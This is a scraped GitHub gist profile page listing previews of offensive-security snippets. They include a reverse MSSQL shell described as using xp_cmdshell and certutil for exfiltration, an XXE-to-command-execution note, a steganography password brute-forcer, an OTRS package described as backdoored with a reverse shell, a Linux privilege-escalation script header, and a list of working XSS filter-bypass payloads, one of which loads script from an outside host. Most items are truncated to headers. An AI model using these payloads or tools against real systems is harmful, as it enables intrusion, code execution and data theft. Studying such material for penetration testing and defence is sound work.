Skip to content

Instantly share code, notes, and snippets.

🏠
Working from home

Fernandez, ReK2 ReK2Fernandez

🏠
Working from home
Block or report user

Report or block ReK2Fernandez

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View NeoMutt colorschemes
# for background in 16 color terminal, valid background colors include:
# base03, bg, black, any of the non brights
# style notes:
# when bg=235, that's a highlighted message
# normal bg=233
# basic colors ---------------------------------------------------------
# color normal brightyellow default
color error color196 color235 # message line error text
@ReK2Fernandez
ReK2Fernandez / mandros.py
Created Jun 5, 2018 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
View SuperGoBuster.sh
#!/bin/bash
set -eu
URL=$1
SECLIST="${HOME}/herramientas/diccionarios/SecLists/Discovery/Web_Content"
MIDDIR="/usr/share/dirbuster/directory-list-2.3-medium.txt"
declare -a FILES=("tomcat.txt" "nginx.txt" "apache.txt" "Top1000-RobotsDisallowed.txt" "ApacheTomcat.fuzz.txt" "sharepoint.txt" "iis.txt")
EXTENSIONS=("txt,php,doc,docx")
GOB="/bin/gobuster"
OUTPUT="${URL}-results"
View gist:1f6f4afc2de1006de4e56e6e9a7d4b20
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
View keybase.md

Keybase proof

I hereby claim:

  • I am rek2fernandez on github.
  • I am cfernandez (https://keybase.io/cfernandez) on keybase.
  • I have a public key ASDB2t5UcZyFOJ7JllgzK85TEJfktBx0ibpsCrPs6aacGQo

To claim this, I am signing this object:

@ReK2Fernandez
ReK2Fernandez / StegBrute.rb
Last active Nov 22, 2017
Brute force steganography passwords
View StegBrute.rb
#!/bin/env ruby
# Hispgatos
# by ReK2, Fernandez Chris
# https://keybase.io/cfernandez
# Bruteforce password protected documents hidden inside images
# add you dictionary below to the dic variable
# of course you need to have installed steghide
require 'open3'
@ReK2Fernandez
ReK2Fernandez / xxsfilterbypass.lst
Last active Nov 15, 2017 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@ReK2Fernandez
ReK2Fernandez / MyPackage.opm
Created Sep 27, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@ReK2Fernandez
ReK2Fernandez / LinuxPrivEsc.sh
Created Aug 24, 2017 — forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
View LinuxPrivEsc.sh
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
You can’t perform that action at this time.